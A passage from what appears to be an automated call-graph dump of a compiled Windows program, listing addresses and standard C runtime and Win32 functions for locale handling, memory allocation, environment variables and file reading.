13010->13012 13011->13010 13012->13002 13015 414361 13013->13015 13017 41438c InterlockedDecrement 13014->13017 13015->13008 13018 414408 13017->13018 13019 41441b InterlockedIncrement 13017->13019 13018->13019 13021 40b6b5 __output_l 63 API calls 13018->13021 13040 414432 13019->13040 13022 41441a 13021->13022 13022->13019 13024 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 13023->13024 13025 414084 13024->13025 13026 4140ad 13025->13026 13027 41408f GetOEMCP 13025->13027 13028 4140b2 GetACP 13026->13028 13029 41409f 13026->13029 13027->13029 13028->13029 13029->13000 13029->13002 13031 414070 getSystemCP 75 API calls 13030->13031 13032 41410c 13031->13032 13033 414117 setSBCS 13032->13033 13036 41415b IsValidCodePage 13032->13036 13038 414180 _memset __setmbcp_nolock 13032->13038 13034 40ce09 __output_l 5 API calls 13033->13034 13035 4142cf 13034->13035 13035->13005 13035->13006 13036->13033 13037 41416d GetCPInfo 13036->13037 13037->13033 13037->13038 13043 413e39 GetCPInfo 13038->13043 13176 40d606 LeaveCriticalSection 13040->13176 13042 414439 13042->13002 13044 413f1f 13043->13044 13046 413e6d _memset 13043->13046 13048 40ce09 __output_l 5 API calls 13044->13048 13053 417625 13046->13053 13050 413fca 13048->13050 13050->13038 13052 417426 ___crtLCMapStringA 98 API calls 13052->13044 13054 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 13053->13054 13055 417638 13054->13055 13063 41746b 13055->13063 13058 417426 13059 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 13058->13059 13060 417439 13059->13060 13129 417081 13060->13129 13064 4174b7 13063->13064 13065 41748c GetStringTypeW 13063->13065 13068 4174a4 13064->13068 13069 41759e 13064->13069 13066 4174ac GetLastError 13065->13066 13065->13068 13066->13064 13067 4174f0 MultiByteToWideChar 13071 417598 13067->13071 13076 41751d 13067->13076 13068->13067 13068->13071 13091 417a20 GetLocaleInfoA 13069->13091 13073 40ce09 __output_l 5 API calls 13071->13073 13074 413eda 13073->13074 13074->13058 13075 4175ef GetStringTypeA 13075->13071 13079 41760a 13075->13079 13080 417532 _memset __crtCompareStringA_stat 13076->13080 13081 40b84d _malloc 63 API calls 13076->13081 13078 41756b MultiByteToWideChar 13083 417581 GetStringTypeW 13078->13083 13084 417592 13078->13084 13085 40b6b5 __output_l 63 API calls 13079->13085 13080->13071 13080->13078 13081->13080 13083->13084 13087 4147ae 13084->13087 13085->13071 13088 4147ba 13087->13088 13089 4147cb 13087->13089 13088->13089 13090 40b6b5 __output_l 63 API calls 13088->13090 13089->13071 13090->13089 13092 417a53 13091->13092 13093 417a4e 13091->13093 13122 416f54 13092->13122 13095 40ce09 __output_l 5 API calls 13093->13095 13096 4175c2 13095->13096 13096->13071 13096->13075 13097 417a69 13096->13097 13098 417aa9 GetCPInfo 13097->13098 13099 417b33 13097->13099 13100 417ac0 13098->13100 13101 417b1e MultiByteToWideChar 13098->13101 13103 40ce09 __output_l 5 API calls 13099->13103 13100->13101 13102 417ac6 GetCPInfo 13100->13102 13101->13099 13106 417ad9 _strlen 13101->13106 13102->13101 13104 417ad3 13102->13104 13105 4175e3 13103->13105 13104->13101 13104->13106 13105->13071 13105->13075 13107 40b84d _malloc 63 API calls 13106->13107 13109 417b0b _memset __crtCompareStringA_stat 13106->13109 13107->13109 13108 417b68 MultiByteToWideChar 13110 417b80 13108->13110 13121 417b9f 13108->13121 13109->13099 13109->13108 13112 417ba4 13110->13112 13113 417b87 WideCharToMultiByte 13110->13113 13111 4147ae __freea 63 API calls 13111->13099 13114 417bc3 13112->13114 13115 417baf WideCharToMultiByte 13112->13115 13113->13121 13116 411cba __calloc_crt 63 API calls 13114->13116 13115->13114 13115->13121 13117 417bcb 13116->13117 13118 417bd4 WideCharToMultiByte 13117->13118 13117->13121 13119 417be6 13118->13119 13118->13121 13120 40b6b5 __output_l 63 API calls 13119->13120 13120->13121 13121->13111 13125 41a354 13122->13125 13126 41a36d 13125->13126 13127 41a125 strtoxl 87 API calls 13126->13127 13128 416f65 13127->13128 13128->13093 13130 4170a2 LCMapStringW 13129->13130 13132 4170bd 13129->13132 13131 4170c5 GetLastError 13130->13131 13130->13132 13131->13132 13133 417117 13132->13133 13134 4172bb 13132->13134 13135 417130 MultiByteToWideChar 13133->13135 13158 4172b2 13133->13158 13136 417a20 ___ansicp 87 API calls 13134->13136 13144 41715d 13135->13144 13135->13158 13138 4172e3 13136->13138 13137 40ce09 __output_l 5 API calls 13139 413efa 13137->13139 13140 4173d7 LCMapStringA 13138->13140 13141 4172fc 13138->13141 13138->13158 13139->13052 13145 417333 13140->13145 13142 417a69 ___convertcp 70 API calls 13141->13142 13147 41730e 13142->13147 13143 4171ae MultiByteToWideChar 13148 4171c7 LCMapStringW 13143->13148 13149 4172a9 13143->13149 13146 40b84d _malloc 63 API calls 13144->13146 13155 417176 __crtCompareStringA_stat 13144->13155 13150 4173fe 13145->13150 13154 40b6b5 __output_l 63 API calls 13145->13154 13146->13155 13151 417318 LCMapStringA 13147->13151 13147->13158 13148->13149 13153 4171e8 13148->13153 13152 4147ae __freea 63 API calls 13149->13152 13157 40b6b5 __output_l 63 API calls 13150->13157 13150->13158 13151->13145 13161 41733a 13151->13161 13152->13158 13156 4171f1 13153->13156 13160 41721a 13153->13160 13154->13150 13155->13143 13155->13158 13156->13149 13159 417203 LCMapStringW 13156->13159 13157->13158 13158->13137 13159->13149 13163 417235 __crtCompareStringA_stat 13160->13163 13165 40b84d _malloc 63 API calls 13160->13165 13164 41734b _memset __crtCompareStringA_stat 13161->13164 13166 40b84d _malloc 63 API calls 13161->13166 13162 417269 LCMapStringW 13167 417281 WideCharToMultiByte 13162->13167 13168 4172a3 13162->13168 13163->13149 13163->13162 13164->13145 13170 417389 LCMapStringA 13164->13170 13165->13163 13166->13164 13167->13168 13169 4147ae __freea 63 API calls 13168->13169 13169->13149 13171 4173a5 13170->13171 13172 4173a9 13170->13172 13175 4147ae __freea 63 API calls 13171->13175 13174 417a69 ___convertcp 70 API calls 13172->13174 13174->13171 13175->13145 13176->13042 13179 41358c 13177->13179 13178 41046e __encode_pointer 6 API calls 13178->13179 13179->13178 13180 4135a4 13179->13180 13180->12316 13184 40d281 13181->13184 13183 40d2ca 13183->12318 13185 40d28d __fcloseall 13184->13185 13192 40e806 13185->13192 13191 40d2ae __fcloseall 13191->13183 13193 40d6e0 __lock 63 API calls 13192->13193 13194 40d292 13193->13194 13195 40d196 13194->13195 13196 4104e9 __decode_pointer 6 API calls 13195->13196 13197 40d1aa 13196->13197 13198 4104e9 __decode_pointer 6 API calls 13197->13198 13199 40d1ba 13198->13199 13200 40d23d 13199->13200 13215 40e56a 13199->13215 13212 40d2b7 13200->13212 13202 41046e __encode_pointer 6 API calls 13203 40d232 13202->13203 13205 41046e __encode_pointer 6 API calls 13203->13205 13204 40d1d8 13207 40d1fc 13204->13207 13211 40d224 13204->13211 13228 411d06 13204->13228 13205->13200 13207->13200 13208 411d06 __realloc_crt 73 API calls 13207->13208 13209 40d212 13207->13209 13208->13209 13209->13200 13210 41046e __encode_pointer 6 API calls 13209->13210 13210->13211 13211->13202 13277 40e80f 13212->13277 13216 40e576 __fcloseall 13215->13216 13217 40e5a3 13216->13217 13218 40e586 13216->13218 13220 40e5e4 HeapSize 13217->13220 13221 40d6e0 __lock 63 API calls 13217->13221 13219 40bfc1 __output_l 63 API calls 13218->13219 13222 40e58b 13219->13222 13224 40e59b __fcloseall 13220->13224 13225 40e5b3 ___sbh_find_block 13221->13225 13223 40e744 __output_l 6 API calls 13222->13223 13223->13224 13224->13204 13233 40e604 13225->13233 13232 411d0f 13228->13232 13230 411d4e 13230->13207 13231 411d2f Sleep 13231->13232 13232->13230 13232->13231 13237 40e34f 13232->13237 13236 40d606 LeaveCriticalSection 13233->13236 13235 40e5df 13235->13220 13235->13224 13236->13235 13238 40e35b __fcloseall 13237->13238 13239 40e370 13238->13239 13240 40e362 13238->13240 13242 40e383 13239->13242 13243 40e377 13239->13243 13241 40b84d _malloc 63 API calls 13240->13241 13258 40e36a __fcloseall _realloc 13241->13258 13250 40e4f5 13242->13250 13272 40e390 _realloc ___sbh_resize_block ___sbh_find_block 13242->13272 13244 40b6b5 __output_l 63 API calls 13243->13244 13244->13258 13245 40e528 13246 40d2e3 _realloc 6 API calls 13245->13246 13249 40e52e 13246->13249 13247 40d6e0 __lock 63 API calls 13247->13272 13248 40e4fa HeapReAlloc 13248->13250 13248->13258 13252 40bfc1 __output_l 63 API calls 13249->13252 13250->13245 13250->13248 13251 40e54c 13250->13251 13253 40d2e3 _realloc 6 API calls 13250->13253 13255 40e542 13250->13255 13254 40bfc1 __output_l 63 API calls 13251->13254 13251->13258 13252->13258 13253->13250 13256 40e555 GetLastError 13254->13256 13259 40bfc1 __output_l 63 API calls 13255->13259 13256->13258 13258->13232 13261 40e4c3 13259->13261 13260 40e41b HeapAlloc 13260->13272 13261->13258 13262 40e4c8 GetLastError 13261->13262 13262->13258 13263 40e470 HeapReAlloc 13263->13272 13264 40def2 ___sbh_alloc_block 5 API calls 13264->13272 13265 40e4db 13265->13258 13268 40bfc1 __output_l 63 API calls 13265->13268 13266 40d2e3 _realloc 6 API calls 13266->13272 13267 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 13267->13272 13270 40e4e8 13268->13270 13269 40e4be 13271 40bfc1 __output_l 63 API calls 13269->13271 13270->13256 13270->13258 13271->13261 13272->13245 13272->13247 13272->13258 13272->13260 13272->13263 13272->13264 13272->13265 13272->13266 13272->13267 13272->13269 13273 40e493 13272->13273 13276 40d606 LeaveCriticalSection 13273->13276 13275 40e49a 13275->13272 13276->13275 13280 40d606 LeaveCriticalSection 13277->13280 13279 40d2bc 13279->13191 13280->13279 13284 40b9aa __fcloseall _strnlen 13281->13284 13282 40b9b8 13283 40bfc1 __output_l 63 API calls 13282->13283 13285 40b9bd 13283->13285 13284->13282 13286 40b9ec 13284->13286 13287 40e744 __output_l 6 API calls 13285->13287 13288 40d6e0 __lock 63 API calls 13286->13288 13291 40b9cd __fcloseall 13287->13291 13289 40b9f3 13288->13289 13338 40b917 13289->13338 13291->12322 13295 4017cc _realloc 13294->13295 13295->12327 13298 40af70 13296->13298 13297 40b84d _malloc 63 API calls 13297->13298 13298->13297 13299 40af8a 13298->13299 13300 40d2e3 _realloc 6 API calls 13298->13300 13303 40af8c std::bad_alloc::bad_alloc 13298->13303 13299->12332 13300->13298 13301 40afb2 13552 40af49 13301->13552 13303->13301 13305 40d2bd __cinit 74 API calls 13303->13305 13305->13301 13307 40afca 13309 401903 lstrlenA 13308->13309 13310 4018fc 13308->13310 13564 4017e0 13309->13564 13310->12354 13313 401940 GetLastError 13315 40194b MultiByteToWideChar 13313->13315 13316 40198d 13313->13316 13314 401996 13314->12354 13317 4017e0 78 API calls 13315->13317 13316->13314 13580 401030 GetLastError 13316->13580 13318 401970 MultiByteToWideChar 13317->13318 13318->13316 13321 40af66 75 API calls 13320->13321 13322 40187c 13321->13322 13323 401885 SysAllocString 13322->13323 13324 4018a4 13322->13324 13323->13324 13324->12356 13326 40231a #24 13325->13326 13326->12363 13328 4019aa InterlockedDecrement 13327->13328 13329 4019df #9 13327->13329 13328->13329 13330 4019b8 13328->13330 13329->12371 13330->13329 13331 4019c2 #6 13330->13331 13332 4019c9 13330->13332 13331->13332 13589 40aec0 13332->13589 13335 401571 13334->13335 13337 401582 13334->13337 13595 40afe0 13335->13595 13337->12334 13337->13337 13339 40b930 13338->13339 13340 40b92c 13338->13340 13339->13340 13342 40b942 _strlen 13339->13342 13347 40eeab 13339->13347 13344 40ba18 13340->13344 13342->13340 13357 40edfb 13342->13357 13551 40d606 LeaveCriticalSection 13344->13551 13346 40ba1f 13346->13291 13354 40ef2b 13347->13354 13355 40eec6 13347->13355 13348 40eecc WideCharToMultiByte 13348->13354 13348->13355 13349 411cba __calloc_crt 63 API calls 13349->13355 13350 40eeef WideCharToMultiByte 13351 40ef37 13350->13351 13350->13355 13352 40b6b5 __output_l 63 API calls 13351->13352 13352->13354 13354->13342 13355->13348 13355->13349 13355->13350 13355->13354 13356 40b6b5 __output_l 63 API calls 13355->13356 13360 414d44 13355->13360 13356->13355 13452 40ed0d 13357->13452 13361 414d76 13360->13361 13362 414d59 13360->13362 13364 414dd4 13361->13364 13406 417e7e 13361->13406 13363 40bfc1 __output_l 63 API calls 13362->13363 13365 414d5e 13363->13365 13366 40bfc1 __output_l 63 API calls 13364->13366 13368 40e744 __output_l 6 API calls 13365->13368 13376 414d6e 13366->13376 13368->13376 13370 414db5 13372 414e12 13370->13372 13373 414de7 13370->13373 13374 414dcb 13370->13374 13372->13376 13417 414c98 13372->13417 13373->13376 13379 411c75 __malloc_crt 63 API calls 13373->13379 13377 40eeab ___wtomb_environ 120 API calls 13374->13377 13376->13355 13380 414dd0 13377->13380 13382 414df7 13379->13382 13380->13364 13380->13372 13381 414e8f 13383 414f7a 13381->13383 13388 414e98 13381->13388 13382->13372 13382->13376 13387 411c75 __malloc_crt 63 API calls 13382->13387 13385 40b6b5 __output_l 63 API calls 13383->13385 13384 414e41 13386 40b6b5 __output_l 63 API calls 13384->13386 13385->13376 13390 414e4b 13386->13390 13387->13372 13388->13376 13389 411d54 __recalloc_crt 74 API calls 13388->13389 13392 414e51 _strlen 13389->13392 13390->13392 13421 411d54 13390->13421 13392->13376 13394 411cba __calloc_crt 63 API calls 13392->13394 13405 414f5e 13392->13405 13393 40b6b5 __output_l 63 API calls 13393->13376 13395 414efb _strlen 13394->13395 13396 40ef42 _strcpy_s 63 API calls 13395->13396 13395->13405 13397 414f14 13396->13397 13398 414f28 SetEnvironmentVariableA 13397->13398 13399 40e61c __invoke_watson 10 API calls 13397->13399 13400 414f49 13398->13400 13401 414f52 13398->13401 13402 414f25 13399->13402 13403 40bfc1 __output_l 63 API calls 13400->13403 13404 40b6b5 __output_l 63 API calls 13401->13404 13402->13398 13403->13401 13404->13405 13405->13376 13405->13393 13426 417dc2 13406->13426 13408 414d89 13408->13364 13408->13370 13409 414cea 13408->13409 13410 414d3b 13409->13410 13411 414cfb 13409->13411 13410->13370 13412 411cba __calloc_crt 63 API calls 13411->13412 13413 414d12 13412->13413 13414 414d24 13413->13414 13415 40e79a __amsg_exit 63 API calls 13413->13415 13414->13410 13433 417d6d 13414->13433 13415->13414 13420 414ca6 13417->13420 13418 414ccd 13418->13381 13418->13384 13419 40edfb __fassign 107 API calls 13419->13420 13420->13418 13420->13419 13424 411d5d 13421->13424 13423 411da0 13423->13392 13424->13423 13425 411d81 Sleep 13424->13425 13441 40b783 13424->13441 13425->13424 13427 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 13426->13427 13428 417dd6 13427->13428 13429 40bfc1 __output_l 63 API calls 13428->13429 13432 417df4 __mbschr_l 13428->13432 13430 417de4 13429->13430 13431 40e744 __output_l 6 API calls 13430->13431 13431->13432 13432->13408 13434 417d7e _strlen 13433->13434 13440 417d7a 13433->13440 13435 40b84d _malloc 63 API calls 13434->13435 13436 417d91 13435->13436 13437 40ef42 _strcpy_s 63 API calls 13436->13437 13436->13440 13438 417da3 13437->13438 13439 40e61c __invoke_watson 10 API calls 13438->13439 13438->13440 13439->13440 13440->13414 13442 40b792 13441->13442 13443 40b7ba 13441->13443 13442->13443 13445 40b79e 13442->13445 13444 40b7cf 13443->13444 13446 40e56a __msize 64 API calls 13443->13446 13447 40e34f _realloc 72 API calls 13444->13447 13448 40bfc1 __output_l 63 API calls 13445->13448 13446->13444 13451 40b7b3 _memset 13447->13451 13449 40b7a3 13448->13449 13450 40e744 __output_l 6 API calls 13449->13450 13450->13451 13451->13424 13453 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 13452->13453 13454 40ed21 13453->13454 13455 40ed42 13454->13455 13456 40ed75 13454->13456 13469 40ed2a 13454->13469 13457 40bfc1 __output_l 63 API calls 13455->13457 13459 40ed99 13456->13459 13460 40ed7f 13456->13460 13458 40ed47 13457->13458 13461 40e744 __output_l 6 API calls 13458->13461 13463 40eda1 13459->13463 13464 40edb5 13459->13464 13462 40bfc1 __output_l 63 API calls 13460->13462 13461->13469 13466 40ed84 13462->13466 13470 414b9e 13463->13470 13490 414b5c 13464->13490 13468 40e744 __output_l 6 API calls 13466->13468 13468->13469 13469->13342 13471 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 13470->13471 13472 414bb2 13471->13472 13473 414bd3 13472->13473 13474 414c06 13472->13474 13487 414bbb 13472->13487 13475 40bfc1 __output_l 63 API calls 13473->13475 13476 414c10 13474->13476 13477 414c2a 13474->13477 13478 414bd8 13475->13478 13479 40bfc1 __output_l 63 API calls 13476->13479 13480 414c34 13477->13480 13481 414c49 13477->13481 13482 40e744 __output_l 6 API calls 13478->13482 13483 414c15 13479->13483 13495 417c1d 13480->13495 13485 414b5c ___crtCompareStringA 96 API calls 13481->13485 13482->13487 13486 40e744 __output_l 6 API calls 13483->13486 13488 414c63 13485->13488 13486->13487 13487->13469 13488->13487 13489 40bfc1 __output_l 63 API calls 13488->13489 13489->13487 13491 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 13490->13491 13492 414b6f 13491->13492 13511 4147ec 13492->13511 13496 417c33 13495->13496 13509 417c58 ___ascii_strnicmp 13495->13509 13497 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 13496->13497 13498 417c3e 13497->13498 13499 417c43 13498->13499 13500 417c78 13498->13500 13501 40bfc1 __output_l 63 API calls 13499->13501 13502 417c82 13500->13502 13510 417caa 13500->13510 13503 417c48 13501->13503 13505 40bfc1 __output_l 63 API calls 13502->13505 13504 40e744 __output_l 6 API calls 13503->13504 13504->13509 13506 417c87 13505->13506 13507 40e744 __output_l 6 API calls 13506->13507 13507->13509 13508 4168fc 98 API calls __tolower_l 13508->13510 13509->13487 13510->13508 13510->13509 13512 414818 CompareStringW 13511->13512 13514 41482f strncnt 13511->13514 13513 41483b GetLastError 13512->13513 13512->13514 13513->13514 13516 414a95 13514->13516 13520 4148a4 13514->13520 13530 414881 13514->13530 13515 40ce09 __output_l 5 API calls 13517 414b5a 13515->13517 13518 417a20 ___ansicp 87 API calls 13516->13518 13517->13469 13519 414abb 13518->13519 13522 414b1c CompareStringA 13519->13522 13525 417a69 ___convertcp 70 API calls 13519->13525 13519->13530 13521 414962 MultiByteToWideChar 13520->13521 13524 4148e6 GetCPInfo 13520->13524 13520->13530 13521->13530 13532 414982 13521->13532 13523 414b3a 13522->13523 13522->13530 13526 40b6b5 __output_l 63 API calls 13523->13526 13527 4148f7 13524->13527 13524->13530 13528 414ae0 13525->13528 13529 414b40 13526->13529 13527->13521 13527->13530 13528->13530 13536 417a69 ___convertcp 70 API calls 13528->13536 13533 40b6b5 __output_l 63 API calls 13529->13533 13530->13515 13531 4149d9 MultiByteToWideChar 13534 4149f2 MultiByteToWideChar 13531->13534 13535 414a83 13531->13535 13537 40b84d _malloc 63 API calls 13532->13537 13540 41499f __crtCompareStringA_stat 13532->13540 13533->13530 13534->13535 13545 414a09 13534->13545 13539 4147ae __freea 63 API calls 13535->13539 13538 414b01 13536->13538 13537->13540 13541 414b16 13538->13541 13542 414b0a 13538->13542 13539->13530 13540->13530 13540->13531 13541->13522 13543 40b6b5 __output_l 63 API calls 13542->13543 13543->13530 13544 414a53 MultiByteToWideChar 13547 414a66 CompareStringW 13544->13547 13548 414a7d 13544->13548 13546 40b84d _malloc 63 API calls 13545->13546 13549 414a1f __crtCompareStringA_stat 13545->13549 13546->13549 13547->13548 13550 4147ae __freea 63 API calls 13548->13550 13549->13535 13549->13544 13550->13535 13551->13346 13558 40d0f5 13552->13558 13555 40cd39 13556 40cd62 13555->13556 13557 40cd6e RaiseException 13555->13557 13556->13557 13557->13307 13559 40af59 13558->13559 13560 40d115 _strlen 13558->13560 13559->13555 13560->13559 13561 40b84d _malloc 63 API calls 13560->13561 13562 40d128 13561->13562 13562->13559 13563 40ef42 _strcpy_s 63 API calls 13562->13563 13563->13559 13565 4017f3 13564->13565 13566 4017e9 EntryPoint 13564->13566 13567 401805 13565->13567 13568 4017fb EntryPoint 13565->13568 13566->13565 13569 401818 13567->13569 13570 40180e EntryPoint 13567->13570 13568->13567 13571 401844 13569->13571 13572 40183e 13569->13572 13574 40b783 __recalloc 73 API calls 13569->13574 13570->13569 13577 40186d MultiByteToWideChar 13571->13577 13578 40184e EntryPoint 13571->13578 13582 40b743 13571->13582 13575 40b6b5 __output_l 63 API calls 13572->13575 13576 40182d 13574->13576 13575->13571 13576->13571 13579 401834 EntryPoint 13576->13579 13577->13313 13577->13314 13578->13571 13579->13572 13581 401044 EntryPoint 13580->13581 13583 40e231 __calloc_impl 63 API calls 13582->13583 13585 40b75d 13583->13585 13584 40b779 13584->13571 13585->13584 13586 40bfc1 __output_l 63 API calls 13585->13586 13587 40b770 13586->13587 13587->13584 13588 40bfc1 __output_l 63 API calls 13587->13588 13588->13584 13590 40b6b5 __fcloseall 13589->13590 13591 40b714 HeapFree 13590->13591 13592 40b73d __fcloseall 13590->13592 13591->13592 13593 40b727 13591->13593 13592->13329 13594 40bfc1 __output_l 63 API calls 13593->13594 13594->13592 13596 40aff8 13595->13596 13597 40b01f __VEC_memcpy 13596->13597 13598 40b027 13596->13598 13597->13598 13598->13337 13600 40e8ea __fcloseall 13599->13600 13601 40d6e0 __lock 63 API calls 13600->13601 13602 40e8f1 13601->13602 13603 40e9ba __initterm 13602->13603 13604 40e91d 13602->13604 13618 40e9f5 13603->13618 13606 4104e9 __decode_pointer 6 API calls 13604->13606 13608 40e928 13606->13608 13610 40e9aa __initterm 13608->13610 13612 4104e9 __decode_pointer 6 API calls 13608->13612 13609 40e9f2 __fcloseall 13609->12375 13610->13603 13617 40e93d 13612->13617 13613 40e9e9 13614 40e7ee _doexit 4 API calls 13613->13614 13614->13609 13615 4104e0 6 API calls _doexit 13615->13617 13616 4104e9 6 API calls __decode_pointer 13616->13617 13617->13610 13617->13615 13617->13616 13619 40e9d6 13618->13619 13620 40e9fb 13618->13620 13619->13609 13622 40d606 LeaveCriticalSection 13619->13622 13623 40d606 LeaveCriticalSection 13620->13623 13622->13613 13623->13619 13641 405c70 13644 405a20 13641->13644 13643 405c82 13645 405a34 13644->13645 13646 405a5a 13644->13646 13645->13646 13647 405bb3 _realloc 13645->13647 13648 40bfc1 __output_l 63 API calls 13645->13648 13652 4055e0 77 API calls 13645->13652 13655 40bf62 13645->13655 13658 40bc8e 13645->13658 13664 405000 13645->13664 13646->13643 13649 405bf4 13647->13649 13650 40bf62 __fread_nolock 77 API calls 13647->13650 13648->13645 13649->13643 13650->13649 13652->13645 13692 40becc 13655->13692 13657 40bf7a 13657->13645 13659 40bcb2 13658->13659 13660 40bc9d 13658->13660 13659->13645 13661 40bfc1 __output_l 63 API calls 13660->13661 13662 40bca2 13661->13662 13663 40e744 __output_l 6 API calls 13662->13663 13663->13659 13665 405051 13664->13665 13666 40500c 13664->13666 13667 40506f 13665->13667 13918 404f90 13665->13918 13668 40bfc1 __output_l 63 API calls 13666->13668 13667->13645 13670 40501e 13668->13670 13672 40bf62 __fread_nolock 77 API calls 13670->13672 13671 405099 13673 404f90 77 API calls 13671->13673 13674 40503f 13672->13674 13677 4050a0 13673->13677 13674->13665 13676 40bc8e _ferror 63 API calls 13674->13676 13675 405143 13675->13645 13676->13665 13677->13675 13678 404f90 77 API calls 13677->13678 13679 4050ca 13677->13679 13678->13677 13680 4050f1 13679->13680 13682 404f90 77 API calls 13679->13682 13681 405104 13680->13681 13683 404f90 77 API calls 13680->13683 13684 40511e 13681->13684 13689 404f90 77 API calls 13681->13689 13685 4050d4 13682->13685 13683->13680 13687 405132 13684->13687 13690 404f90 77 API calls 13684->13690 13686 404f90 77 API calls 13685->13686 13688 4050db 13686->13688 13687->13645 13688->13680 13691 404f90 77 API calls 13688->13691 13689->13681 13690->13684 13691->13688 13693 40bed8 __fcloseall 13692->13693 13694 40bf21 13693->13694 13695 40beec _memset 13693->13695 13704 40bf16 __fcloseall 13693->13704 13705 40fb29 13694->13705 13697 40bfc1 __output_l 63 API calls 13695->13697 13699 40bf06 13697->13699 13702 40e744 __output_l 6 API calls 13699->13702 13702->13704 13704->13657 13706 40fb3b 13705->13706 13707 40fb5d EnterCriticalSection 13705->13707 13706->13707 13708 40fb43 13706->13708 13709 40bf29 13707->13709 13710 40d6e0 __lock 63 API calls 13708->13710 13711 40bcc2 13709->13711 13710->13709 13712 40bcfe 13711->13712 13714 40bce0 _memset 13711->13714 13727 40bf58 13712->13727 13713 40bce9 13715 40bfc1 __output_l 63 API calls 13713->13715 13714->13712 13714->13713 13722 40bd3d 13714->13722 13726 40bcee 13715->13726 13716 40e744 __output_l 6 API calls 13716->13712 13718 40be87 _memset 13724 40bfc1 __output_l 63 API calls 13718->13724 13719 40be5b _memset 13723 40bfc1 __output_l 63 API calls 13719->13723 13722->13712 13722->13718 13722->13719 13730 4103f1 13722->13730 13739 40fa20 13722->13739 13745 4102f4 13722->13745 13775 40fc07 13722->13775 13723->13726 13724->13726 13726->13716 13911 40fb9c 13727->13911 13729 40bf60 13729->13704 13733 410405 _memset 13730->13733 13736 410401 _realloc 13730->13736 13731 41040a 13732 40bfc1 __output_l 63 API calls 13731->13732 13738 41040f 13732->13738 13733->13731 13734 410454 13733->13734 13733->13736 13734->13736 13737 40bfc1 __output_l 63 API calls 13734->13737 13735 40e744 __output_l 6 API calls 13735->13736 13736->13722 13737->13738 13738->13735 13740 40fa44 13739->13740 13741 40fa2f 13739->13741 13740->13722 13742 40bfc1 __output_l 63 API calls 13741->13742 13743 40fa34 13742->13743 13744 40e744 __output_l 6 API calls 13743->13744 13744->13740 13746 410300 __fcloseall 13745->13746 13747 410323 13746->13747 13748 410308 13746->13748 13749 410331 13747->13749 13754 410372 13747->13754 13795 40bfd4 13748->13795 13751 40bfd4 __lseeki64 63 API calls 13749->13751 13753 410336 13751->13753 13756 40bfc1 __output_l 63 API calls 13753->13756 13757 410393 13754->13757 13758 41037f 13754->13758 13755 40bfc1 __output_l 63 API calls 13774 410315 __fcloseall 13755->13774 13760 41033d 13756->13760 13798 415599 13757->13798 13761 40bfd4 __lseeki64 63 API calls 13758->13761 13767 40e744 __output_l 6 API calls 13760->13767 13762 410384 13761->13762 13764 40bfc1 __output_l 63 API calls 13762->13764 13763 410399 13765 4103a6 13763->13765 13766 4103bc 13763->13766 13764->13760 13808 40fd32 13765->13808 13769 40bfc1 __output_l 63 API calls 13766->13769 13767->13774 13771 4103c1 13769->13771 13770 4103b4 13872 4103e7 13770->13872 13772 40bfd4 __lseeki64 63 API calls 13771->13772 13772->13770 13774->13722 13776 40fc17 13775->13776 13779 40fc34 13775->13779 13777 40bfc1 __output_l 63 API calls 13776->13777 13778 40fc1c 13777->13778 13780 40e744 __output_l 6 API calls 13778->13780 13781 40fc69 13779->13781 13788 40fc2c 13779->13788 13908 41512d 13779->13908 13780->13788 13783 40fa20 __fileno 63 API calls 13781->13783 13784 40fc7d 13783->13784 13785 4102f4 __read 75 API calls 13784->13785 13786 40fc84 13785->13786 13787 40fa20 __fileno 63 API calls 13786->13787 13786->13788 13789 40fca7 13787->13789 13788->13722 13789->13788 13790 40fa20 __fileno 63 API calls 13789->13790 13791 40fcb3 13790->13791 13791->13788 13792 40fa20 __fileno 63 API calls 13791->13792 13793 40fcbf 13792->13793 13794 40fa20 __fileno 63 API calls 13793->13794 13794->13788 13796 4106bc __getptd_noexit 63 API calls 13795->13796 13797 40bfd9 13796->13797 13797->13755 13799 4155a5 __fcloseall 13798->13799 13800 415600 13799->13800 13803 40d6e0 __lock 63 API calls 13799->13803 13801 415622 __fcloseall 13800->13801 13802 415605 EnterCriticalSection 13800->13802 13801->13763 13802->13801 13804 4155d1 13803->13804 13805 4155e8 13804->13805 13807 41389c __ioinit InitializeCriticalSectionAndSpinCount 13804->13807 13875 415630 13805->13875 13807->13805 13809 40fd69 13808->13809 13810 40fd4e 13808->13810 13812 40fd78 13809->13812 13814 40fd9f 13809->13814 13811 40bfd4 __lseeki64 63 API calls 13810->13811 13813 40fd53 13811->13813 13815 40bfd4 __lseeki64 63 API calls 13812->13815 13818 40bfc1 __output_l 63 API calls 13813->13818 13816 40fdd2 13814->13816 13817 40fdbe 13814->13817 13819 40fd7d 13815->13819 13822 40fe2a 13816->13822 13831 40fe06 13816->13831 13832 40fe4b 13816->13832 13853 40fd5b 13816->13853 13821 40bfd4 __lseeki64 63 API calls 13817->13821 13818->13853 13820 40bfc1 __output_l 63 API calls 13819->13820 13823 40fd84 13820->13823 13825 40fdc3 13821->13825 13824 40bfd4 __lseeki64 63 API calls 13822->13824 13826 40e744 __output_l 6 API calls 13823->13826 13827 40fe2f 13824->13827 13828 40bfc1 __output_l 63 API calls 13825->13828 13826->13853 13829 40bfc1 __output_l 63 API calls 13827->13829 13830 40fdca 13828->13830 13829->13830 13833 40e744 __output_l 6 API calls 13830->13833 13831->13822 13839 40fe11 ReadFile 13831->13839 13835 411c75 __malloc_crt 63 API calls 13832->13835 13833->13853 13836 40fe61 13835->13836 13840 40fe87 13836->13840 13841 40fe69 13836->13841 13837 4102b8 GetLastError 13842 4102c5 13837->13842 13843 41013e 13837->13843 13838 40ff3d 13838->13837 13846 40ff51 13838->13846 13839->13837 13839->13838 13879 414f8f 13840->13879 13845 40bfc1 __output_l 63 API calls 13841->13845 13844 40bfc1 __output_l 63 API calls 13842->13844 13855 4100c3 13843->13855 13889 40bfe7 13843->13889 13848 4102ca 13844->13848 13849 40fe6e 13845->13849 13846->13855 13865 410183 13846->13865 13867 40ff6d 13846->13867 13851 40bfd4 __lseeki64 63 API calls 13848->13851 13852 40bfd4 __lseeki64 63 API calls 13849->13852 13851->13855 